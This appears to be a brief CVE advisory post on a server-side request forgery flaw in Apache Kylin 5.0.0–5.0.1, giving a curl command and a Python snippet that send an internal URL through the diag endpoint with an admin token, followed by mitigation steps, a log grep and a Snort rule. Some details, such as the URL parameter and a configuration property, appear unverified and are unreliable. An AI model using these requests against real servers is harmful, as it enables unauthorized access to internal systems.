How the CVE Works:
The vulnerability exists in Apache Kylin versions 5.0.0 to 5.0.1, where an attacker with admin access can exploit the `/kylin/api/xxx/diag` endpoint to perform Server-Side Request Forgery (SSRF). By crafting malicious requests, the attacker forces the Kylin server to send unauthorized requests to internal systems hosting the same API. If the internal host exposes the `/kylin/api/xxx/diag` endpoint, sensitive information may be leaked. The attack requires admin privileges and depends on internal network exposure of the vulnerable API.
DailyCVE Form:
Platform: Apache Kylin
Version: 5.0.0 – 5.0.1
Vulnerability: SSRF
Severity: Low
Date: Mar 27, 2025
What Undercode Say:
Exploitation:
1. Curl Exploit:
curl -X GET "http://<target>/kylin/api/xxx/diag?url=http://internal-host/api/diag" -H "Authorization: Bearer <admin-token>"
2. Python Exploit:
import requests
url = "http://<target>/kylin/api/xxx/diag"
headers = {"Authorization": "Bearer <admin-token>"}
params = {"url": "http://internal-host/api/diag"}
response = requests.get(url, headers=headers, params=params)
print(response.text)
Mitigation:
1. Patch Upgrade:
Upgrade to Kylin 5.0.2 wget https://downloads.apache.org/kylin/5.0.2/apache-kylin-5.0.2-bin.tar.gz tar -xzf apache-kylin-5.0.2-bin.tar.gz
2. Network Restriction:
Block internal API exposure via firewall iptables -A INPUT -p tcp --dport 7070 -j DROP
3. Endpoint Hardening:
<!-- Restrict API access in kylin.properties --> security.diag.endpoint.restrict=true
Detection:
1. Log Analysis:
grep "/kylin/api/./diag" /var/log/kylin/access.log | grep -v "127.0.0.1"
2. IDS Rule (Snort):
alert tcp any any -> any 7070 (msg:"Kylin SSRF Attempt"; content:"/kylin/api/"; content:"diag"; nocase; sid:10001;)
References:
References:
Reported By: https://github.com/advisories/GHSA-3v67-545x-ffc3
Extra Source Hub:
Undercode
